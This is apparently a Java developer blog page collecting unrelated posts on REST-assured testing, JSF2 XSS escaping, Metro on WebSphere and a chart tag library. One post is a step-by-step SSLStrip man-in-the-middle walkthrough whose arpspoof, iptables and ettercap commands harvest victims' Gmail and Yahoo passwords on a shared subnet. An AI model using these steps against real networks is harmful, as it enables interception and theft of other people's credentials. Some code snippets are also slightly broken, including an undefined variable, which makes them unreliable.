REST-assured Tricks How to test a value in JSON

Use equalTo()
When the value is a string use single quotes '121'
In the below example the openbalance is a property of useraccount. useraccount is the JSON object name in the JSON.
Some implementation does not return the object name. In such cases replace "useraccount.openbalance" with "openbalance"

String result = given().header("accept", "application/json")
 .contentType(ContentType.XML).body(xmlBody)
 .expect().body("useraccount.openbalance", equalTo(121),"useraccount.useraccountid",notNullValue())
                .when().post("/RestFullDayTrader/resources/acct").asString();

REST-assured Tricks How to test for 307 Temporary Redirect ?

Testing for 307 has two parts a) test http status code b) test http header Location

String xmlBody = "<orderData><orderType>BUY</orderType><quantity>44</quantity><useraccountid>10</useraccountid></orderData>";
//xml payload
String location = given()
        .body(xmlBody)
        .contentType(ContentType.XML).body(xmlBody)
 // a) test http status code 307
 .expect().statusCode(307)
       .when()
       .post("/RestFullDayTrader/resources/pending_orders/100").getHeader("Location");
        System.out.println(" Location " + location);      
 // b) test http header Location   
  assertTrue(location1.contains("pending_orders/100"));

Test code using prettify

public void testReliablePostBuy() throws Exception {
        System.out.println("testReliablePostBuy");
        String xmlBody = "BUY44SYMBOLICIC110";
        //xml
    

How to use prettify with blogger/blogspot?

Secure applications with JSF JSF2 XSS

Securing web-applications with JSF2 is lot more easier. Java EE provides a lot of security features.Lets examine these features under the context of OWASP top Ten actually try to hack the application and analyze the results.

XSS or CrossSite Scripting : Protection against XSS is inbuilt and available by default. I have created sample application using Netbeans. It has a kool code generator for jsf2 crud operations.

Jsf code to display a field. <h:outputText value="#{item.description}" />

Lets inject XSS vector from http://ha.ckers.org/xss.html .

Result after injecting javascript into description fields

Note that the javascript is displayed in the table as is. It is not executed. Another screen shot with IE

I got similar result with Chrome.

Modified the jsf not to handle XSS <h:outputText value="#{item.description}" escape="false"/>

Popup in FireFox

Hacked Result in FF

Hacked Result in IE

Hacked Result in Chrome, Interestingly Chrome was not able to render the page.

Conclusion jsf provides XSS protection by Default. I soon present results of more attacks.

SSLStrip Step by Step on Ubuntu

SSLStrip used along with MITM to hack SSL websites.
You will need following tools

1. SSLStrip
2. arpspoof
3. ettercap
4. Ubuntu Linux
5. Internet Connection
6. Victim has to be in the same subnet

Step 1:- Download SSLStrip from http://www.thoughtcrime.org/software/sslstrip/

Step 2:- Unzip the downloaded files use "tar -zxvf sslstrip-0.4.tar.gz"


Step 3:- Build SSLStrip change directory to unzip folder run "python setup.py build"

Step 4:- Install SSLStrip run "sudo python setup.py install" , Requires root privilages

Step 5:- Install arpspoof "sudo apt-get install dsniff"

Step 6:- Install ettercap "sudo apt-get install ettercap"


Step 7:- Verify you ipaddress "ifconfig" Notice the hackers ip is 172.168.1.3


Step 8:- Verify your default gateway "ip route show | grep default | awk '{ print $3}' "

Note : This hack works only if victims gateway address is same as that of the Hacker. (172.168.1.1 in the above example)

Step 9:- Create three different tabs in your terminal window. We need to run three commands parallely. In first tab run " sudo arpspoof -t 172.168.1.4 172.168.1.1"


Step 10:- Second tab run "iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 1000"
and run "sslstrip"


Step 11:- In the thisd tab run ettercap. Ethercap will print all the password it sniffed on the console. "sudo ettercap -Tqz"

Step 12:- Wait for the victim to login to gmail , yahoo etc.. the passwords will be printed on ettercap console.

jkookOFCTags Released

jkookOFCTags Released
Download link

jkookOFCTags is a jsp tag library for drawing flash charts. It is based on famous Open Flash Chart project
It extends of Open Flash Chart 2.x Library for Java
Depends on xstream1.3.1

Installing metro on WebSphere6.1

Installing metro on WebSphere6.1. WithOut installing feature pack

Create you web application.
Most important change is add
com.sun.xml.ws.transport.http.servlet.WSServlet and your webservices entries in web.xml and sun-jaxws.xml

Create EAR file

META-INF---\
Application.xml
webmodule.war---\
META-INF --\
MANIFEST.MF
webservices-api.jar
webservices-extra.jar
webservices-extra-api.jar
webservices-rt.jar
webservices-tools.jar


Remove conflicting jars from WEB-INF/lib
jaxb-api-1.5.jar
jaxb-impl-1.5.jar
jaxb-libs-1.5.jar
jaxb-xjc-1.5.jar
jaxrpc-api-1.1.jar
jaxrpc-impl-1.1.jar
jaxrpc-spi-1.1.jar
xerces-2.0.2.jar
xml-apis-2.0.2.jar


Contents of Application.XML

 1

 2 <application id="Application_ID1">

 3     <display-name>MyEnterpriseApplication</display-name>

 4     <module id="WarModule">

 5         <web>

 6             <web-uri>webmodule.war</web-uri>

 7             <context-root>/metrowebservices</context-root>

 8         </web>

 9     </module>

10 </application>

11

add following line to MANIFEST.MF
Class-Path: webservices-api.jar webservices-extra.jar webservices-extra-api.jar webservices-rt.jar webservices-tools.jar


Finally
ON IBM administration console
select : Classes loaded with application class loader first